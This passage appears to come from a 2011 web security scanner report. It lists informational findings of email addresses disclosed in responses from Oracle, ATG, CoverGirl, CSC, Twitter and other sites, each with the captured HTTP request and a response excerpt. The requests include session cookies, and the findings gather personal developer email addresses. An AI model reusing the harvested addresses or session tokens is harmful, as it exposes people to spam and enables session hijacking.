Path:	/forgotPassword1.do

Issue detail

The following email address was disclosed in the response:

xss@xss.cx

Request

Response

22.24. http://search.oracle.com/search/searchui/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.oracle.com
Path:	/search/searchui/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Ss.tc

Request

GET /search/searchui/s_code.js HTTP/1.1
Host: search.oracle.com
Proxy-Connection: keep-alive
Referer: http://search.oracle.com/search/search?start=1&search_p_main_operator=all&group=Oracle+OpenWorld&q=xss+faq+help+contact+phone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=94577a1c1e6c366bc46e69bb4867b280b00dd079463a; ses.qapp.sg_tab_name=Oracle+OpenWorld; s_cc=true; s_nr=1315342463159; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Fregister%2Fpackages%2Findex.html%3Fsrc%3D7013425%26Act%3D226; s_sq=%5B%5BB%5D%5D; BIGipServerses_ext_prod_pool=477779860.30494.0000

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sat, 12 Mar 2011 07:00:10 GMT
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.2 (H;max-age=150+0;age=140;ecid=115635838160,0)
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 29511
Date: Tue, 06 Sep 2011 15:54:25 GMT
Connection: close

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

22.25. https://shop.oracle.com/pls/ostore/f previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://shop.oracle.com
Path:	/pls/ostore/f

Issue detail

The following email address was disclosed in the response:

oraclehelp_ww@oracle.com

Request

GET /pls/ostore/f?p=700:2:3925708704474272::NO:RP,2:PROD_HIER_ID:4509881204651805720002&tz=-5:00 HTTP/1.1
Host: shop.oracle.com
Connection: keep-alive
Referer: https://shop.oracle.com/pls/ostore/f?p=700:2:0::NO:RP,2:PROD_HIER_ID:4509881204651805720002
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWV_PUBLIC_SESSION_700=3925708704474272; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343714603; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Ftechnetwork%2Fcommunity%2Fdeveloper-vm%2Findex.html; s_sq=oracleotnlive%2Coracleglobal%3D%2526pid%253Dotn%25253Aen-us%25253A%25252Fcommunity%25252Fdeveloper-vm%25252F%2526pidt%253D1%2526oid%253Dotn%25253Aen%25253Ahnav%25253Astore%25253Astoredatabase%25253Astoredatabaseseeall%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:15:21 GMT
Server: Oracle-Application-Server-10g
Vary: Host
Content-Length: 57414
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Product Category - Database</t
...[SNIP]...
<a href="mailto:oraclehelp_ww@oracle.com?subject=Oracle Store Inquiry">
...[SNIP]...

22.26. https://support.bigcommerce.com/javascript/livesearch.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.bigcommerce.com
Path:	/javascript/livesearch.js

Issue detail

The following email address was disclosed in the response:

devel@bitflux.ch

Request

GET /javascript/livesearch.js HTTP/1.1
Host: support.bigcommerce.com
Connection: keep-alive
Referer: https://support.bigcommerce.com/questions/1127/How+do+I+Setup+SocialShop+%28v2%29+Application+in+Facebook%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; __utmz=41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utmz=^first.1331109506396:41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=95sh21hkr74gpcp03q1tinf0b1k1muq3; 2__utma=^first.1378413579147:41658941.1556216253.1315341506.1315341506.1315341506.1; 2__utmb=^first.1315343379147:41658941.7.10.1315341506; 2__utmc=^first.1378413579147:41658941; __utma=41658941.485543067.1315341506.1315341506.1315341506.1; __utmb=41658941.16.10.1315341506; __utmc=41658941

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:39:46 GMT
Server: Apache
Last-Modified: Wed, 24 Feb 2010 02:22:15 GMT
ETag: "1a24-4804f55acc3c0"
Accept-Ranges: bytes
Cache-Control: max-age=432000
Expires: Sun, 11 Sep 2011 15:39:46 GMT
Vary: Accept-Encoding
Content-Length: 6692
Connection: close
Content-Type: application/javascript

/*
// +----------------------------------------------------------------------+
// | Copyright (c) 2004 Bitflux GmbH |
// +--------------------------------------
...[SNIP]...
<devel@bitflux.ch>
...[SNIP]...

22.27. http://thinkwrap.com/wp-content/themes/vision/library/media/js/jquery.innerfade.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://thinkwrap.com
Path:	/wp-content/themes/vision/library/media/js/jquery.innerfade.js

Issue detail

The following email address was disclosed in the response:

t.baldes@medienfreunde.com

Request

GET /wp-content/themes/vision/library/media/js/jquery.innerfade.js?ver=2.9.2 HTTP/1.1
Host: thinkwrap.com
Proxy-Connection: keep-alive
Referer: http://thinkwrap.com/ourfocus/atg-ecommerce-solutions-partner/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:42 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Mon, 23 Aug 2010 11:42:00 GMT
ETag: "1a1ce-3da0-48e7c22eeb200"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 15776
Content-Type: application/javascript

/* =========================================================

// jquery.innerfade.js

// Datum: 2008-02-14
// Firma: Medienfreunde Hofmann & Baldes GbR
// Author: Torsten Baldes
// Mail: t.baldes@medienfreunde.com
// Web: http://medienfreunde.com

// based on the work of Matt Oakes http://portfolio.gizone.co.uk/applications/slideshow/
// and Ralf S. Engelschall http://trainofthoughts.org/

*
* <ul id=
...[SNIP]...

22.28. http://twitter.com/favorites/shopify.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/favorites/shopify.json

Issue detail

The following email address was disclosed in the response:

stevenhaddox@shortmail.com

Request

GET /favorites/shopify.json?callback=jsonp1315341241192&_=1315341242270 HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/examples
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; js=1; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; original_referer=ZLhHHTiegr%2BtBqX%2ByaisxCLF6xfO3uKHShNVLj0esMdHqHFECtPbOE1k52hOf7UKzfYel%2B8XI7S4OHB7xajaLQ%3D%3D; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCH00Xj8yASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJTUy%250ANTA5ZjQ3YzU2NjU3NDczMjkwZTE4ZjM0ODEyNmJj--6efa10660411d898fcdb6e0727f46bb60e898b0d

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:25 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315323265-77462-12903
X-RateLimit-Limit: 150
ETag: "d85462a61b67e0c3fc4866501999a05e"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Tue, 06 Sep 2011 15:34:25 GMT
X-RateLimit-Remaining: 79
X-Runtime: 0.08983
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: ddde2aba33aaf670ae3703c911641ba819c591a7
X-RateLimit-Reset: 1315326731
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCH00Xj8yASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJTUy%250ANTA5ZjQ3YzU2NjU3NDczMjkwZTE4ZjM0ODEyNmJj--6efa10660411d898fcdb6e0727f46bb60e898b0d; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Content-Length: 39503
Connection: close

jsonp1315341241192([{"id_str":"109286997138489344","in_reply_to_status_id":null,"truncated":false,"user":{"profile_sidebar_fill_color":"E6F6F9","protected":false,"id_str":"62222199","notifications":nu
...[SNIP]...
:true,"utc_offset":-18000,"profile_link_color":"003F7A","description":"A romantic code-monkey who is a Ruby, Rails, and Mac evanglist. I'm a Mormon and created @flickr4tw1tter & RVM::FW. E-mail me at: stevenhaddox@shortmail.com","profile_sidebar_border_color":"337A91","url":"http:\/\/stevenhaddox.com","time_zone":"Indiana (East)","default_profile_image":false,"default_profile":false,"statuses_count":18807,"profile_use_backgr
...[SNIP]...

22.29. http://webzoomers.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webzoomers.com
Path:	/

Issue detail

The following email address was disclosed in the response:

Info@ResourcePoint.net

Request

GET / HTTP/1.1
Host: webzoomers.com
Proxy-Connection: keep-alive
Referer: http://www.resourcepoint.net/solutions.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:36:53 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 42574
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:Info@ResourcePoint.net">
...[SNIP]...

22.30. https://www.atg.com/en/password/request/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.atg.com
Path:	/en/password/request/

Issue detail

The following email address was disclosed in the response:

support@atg.com

Request

Response

22.31. https://www.atg.com/javascript/form.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.atg.com
Path:	/javascript/form.js

Issue detail

The following email addresses were disclosed in the response:

abayiate@atg.com
atg-commerce@atg.com
atg-optimization@atg.com
atgsales@atg.com
cmanfred@atg.com
webmaster@atg.com

Request

GET /javascript/form.js HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Referer: https://www.atg.com/en/register/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 19 Jul 2010 15:34:31 GMT
ETag: "60d8f-d77-48bbf4e07efc0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 3447
Content-Type: application/x-javascript
Cache-Control: proxy-revalidate, max-age=7200
Expires: Tue, 06 Sep 2011 17:53:54 GMT
Date: Tue, 06 Sep 2011 15:53:54 GMT
Connection: keep-alive

<!--//
function displayState(){
if (document.getElementById){
var mcountry = document.getElementById('country');
var mstateLabel = document.getElementById('stateList');
if (mcountry !
...[SNIP]...
['questionEmailRecipient'].value == "Sales - Commerce Suite/Platform" || frm.elements['questionEmailRecipient'].value == "Sales - Commerce OnDemand"){
frm.elements['campaignEmailTo'].value = "atg-commerce@atg.com";
frm.elements['campaignCode'].value = 'Web_ContactMe';
frm.elements['interactionCode'].value = 'LXPD5A00058K';
} else if (frm.elements['questionEmailRecipient'].value == "Sales - All"){
frm.elements['campaignEmailTo'].value = "atgsales@atg.com";
frm.elements['campaignCode'].value = 'Web_ContactMe';
frm.elements['interactionCode'].value = 'LXPD5A00058K';
} else if (frm.elements['questionEmailRecipient'].value == "Sales - Click to Call or Click to Chat" || frm.elements['questionEmailRecipient'].value == "Sales - Recommendations" ){
frm.elements['campaignEmailTo'].value = "atg-optimization@atg.com";
frm.elements['campaignCode'].value = 'WebES-Contact-Me';
frm.elements['interactionCode'].value = 'WebES-Contact_Me_Requested';
} else if (frm.elements['questionEmailRecipient'].value == "Sales - Call Tracking" ){
frm.elements['campaignEmailTo'].value = "atg-optimization@atg.com";
frm.elements['campaignCode'].value = 'WebES-Contact-Me-Media';
frm.elements['interactionCode'].value = 'WebES-Contact-Me-Media_Requested';
} else if (frm.elements['questionEmailRecipient'].value == "Other" ){
frm.elements['campaignEmailTo'].value = "webmaster@atg.com,abayiate@atg.com,cmanfred@atg.com";
frm.elements['campaignCode'].value = 'Web_ContactMe_Others';
frm.elements['interactionCode'].value = 'Web_ContactMe_Others_Requested';
}else {
frm.elements['campai
...[SNIP]...

22.32. http://www.beautyproductsdirect.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beautyproductsdirect.com
Path:	/

Issue detail

The following email address was disclosed in the response:

info@beautyproductsdirect.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:22 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7d
Last-Modified: Tue, 17 May 2011 11:55:25 GMT
ETag: "29a4892-2c7c-4dd2622d"
Accept-Ranges: bytes
Content-Length: 11388
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Beauty Products Dire
...[SNIP]...
<a href="mailto:info@beautyproductsdirect.com">info@beautyproductsdirect.com</a>
...[SNIP]...

22.33. http://www.beautyproductsdirect.com/inc/js/jquery.innerfade.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beautyproductsdirect.com
Path:	/inc/js/jquery.innerfade.js

Issue detail

The following email address was disclosed in the response:

t.baldes@medienfreunde.com

Request

GET /inc/js/jquery.innerfade.js HTTP/1.1
Host: www.beautyproductsdirect.com
Proxy-Connection: keep-alive
Referer: http://www.beautyproductsdirect.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:22 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7d
Last-Modified: Fri, 01 Apr 2011 11:34:27 GMT
ETag: "29a4d0f-13be-4d95b843"
Accept-Ranges: bytes
Content-Length: 5054
Content-Type: application/x-javascript

/* =========================================================

// jquery.innerfade.js

// Datum: 2008-02-14
// Firma: Medienfreunde Hofmann & Baldes GbR
// Author: Torsten Baldes
// Mail: t.baldes@medienfreunde.com
// Web: http://medienfreunde.com

// based on the work of Matt Oakes http://portfolio.gizone.co.uk/applications/slideshow/
// and Ralf S. Engelschall http://trainofthoughts.org/

*
* <ul id=
...[SNIP]...

22.34. http://www.beautyproductsdirect.com/lashes.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beautyproductsdirect.com
Path:	/lashes.html

Issue detail

The following email address was disclosed in the response:

info@beautyproductsdirect.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:56 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7d
Last-Modified: Tue, 17 May 2011 11:55:29 GMT
ETag: "29a4c72-21ef-4dd26231"
Accept-Ranges: bytes
Content-Length: 8687
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Beauty Products Dire
...[SNIP]...
<a href="mailto:info@beautyproductsdirect.com">info@beautyproductsdirect.com</a>
...[SNIP]...

22.35. http://www.covergirl.com/CSS/jqModal.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.covergirl.com
Path:	/CSS/jqModal.css

Issue detail

The following email address was disclosed in the response:

bhb@iceburg.net

Request

GET /CSS/jqModal.css HTTP/1.1
Host: www.covergirl.com
Proxy-Connection: keep-alive
Referer: http://www.covergirl.com/beauty-products?utm_source=google&utm_medium=cpc&utm_term=%2Bbeauty%20%2Bproducts&utm_campaign=CG+Evergreen+GKW+-+1011+-+BMM&utm_content=s9xEppg8V|7750439198
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=kmi5afnggj2ugc45ntt0nzzx

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Fri, 12 Aug 2011 09:00:23 GMT
Accept-Ranges: bytes
ETag: "802df044ce58cc1:29583"
Server: Microsoft-IIS/6.0
X-Server: EW58
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:28 GMT
Content-Length: 3907

/* jqModal base Styling courtesy of;
Brice Burgess <bhb@iceburg.net> */

/* The Window's CSS z-index value is respected (takes priority). If none is supplied,
the Window's z-index value will be set
...[SNIP]...

22.36. http://www.covergirl.com/Script/jqModal_mod.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.covergirl.com
Path:	/Script/jqModal_mod.js

Issue detail

The following email address was disclosed in the response:

bhb@iceburg.net

Request

GET /Script/jqModal_mod.js HTTP/1.1
Host: www.covergirl.com
Proxy-Connection: keep-alive
Referer: http://www.covergirl.com/beauty-products?utm_source=google&utm_medium=cpc&utm_term=%2Bbeauty%20%2Bproducts&utm_campaign=CG+Evergreen+GKW+-+1011+-+BMM&utm_content=s9xEppg8V|7750439198
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=kmi5afnggj2ugc45ntt0nzzx

Response

HTTP/1.1 200 OK
Content-Length: 3382
Content-Type: application/x-javascript
Last-Modified: Tue, 09 Aug 2011 12:19:15 GMT
Accept-Ranges: bytes
ETag: "80a3b98d8e56cc1:29583"
Server: Microsoft-IIS/6.0
X-Server: EW58
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:29 GMT

/*
* jqModal - Minimalist Modaling with jQuery
* (http://dev.iceburg.net/jquery/jqModal/)
*
* Copyright (c) 2007,2008 Brice Burgess <bhb@iceburg.net>
* Dual licensed under the MIT and GPL licen
...[SNIP]...

22.37. http://www.covergirl.com/Script/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.covergirl.com
Path:	/Script/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /Script/jquery.cookie.js HTTP/1.1
Host: www.covergirl.com
Proxy-Connection: keep-alive
Referer: http://www.covergirl.com/beauty-products?utm_source=google&utm_medium=cpc&utm_term=%2Bbeauty%20%2Bproducts&utm_campaign=CG+Evergreen+GKW+-+1011+-+BMM&utm_content=s9xEppg8V|7750439198
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=kmi5afnggj2ugc45ntt0nzzx

Response

HTTP/1.1 200 OK
Content-Length: 4246
Content-Type: application/x-javascript
Last-Modified: Tue, 09 Aug 2011 12:19:15 GMT
Accept-Ranges: bytes
ETag: "80a3b98d8e56cc1:29583"
Server: Microsoft-IIS/6.0
X-Server: EW58
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:27 GMT

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

22.38. http://www.covergirl.com/Script/jquery.hoverIntent.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.covergirl.com
Path:	/Script/jquery.hoverIntent.min.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /Script/jquery.hoverIntent.min.js HTTP/1.1
Host: www.covergirl.com
Proxy-Connection: keep-alive
Referer: http://www.covergirl.com/beauty-products?utm_source=google&utm_medium=cpc&utm_term=%2Bbeauty%20%2Bproducts&utm_campaign=CG+Evergreen+GKW+-+1011+-+BMM&utm_content=s9xEppg8V|7750439198
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=kmi5afnggj2ugc45ntt0nzzx

Response

HTTP/1.1 200 OK
Content-Length: 1609
Content-Type: application/x-javascript
Last-Modified: Tue, 09 Aug 2011 12:19:15 GMT
Accept-Ranges: bytes
ETag: "80a3b98d8e56cc1:29583"
Server: Microsoft-IIS/6.0
X-Server: EW58
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:27 GMT

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

22.39. http://www.csc.com/contact_us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csc.com
Path:	/contact_us

Issue detail

The following email address was disclosed in the response:

webmaster@csc.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:09:11 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 16:01:52 GMT
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 16:09:11 GMT
Vary: Accept-Encoding
Content-Length: 14011
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<a href="mailto:webmaster@csc.com">
...[SNIP]...

22.40. http://www.csc.com/javascripts/public/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csc.com
Path:	/javascripts/public/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Us.tc

Request

GET /javascripts/public/s_code.js?v=5 HTTP/1.1
Host: www.csc.com
Proxy-Connection: keep-alive
Referer: http://www.csc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.CSC.Com_HTTP-9000_Pool=1150396288.10275.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:42 GMT
Server: Apache
Last-Modified: Sun, 28 Aug 2011 01:45:58 GMT
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:57:42 GMT
Vary: Accept-Encoding
Content-Length: 24532
Content-Type: application/javascript

/* SiteCatalyst code version: H.15.1.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
P
...[SNIP]...
)`i+s.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`h;`Wm('t')`5s.p"
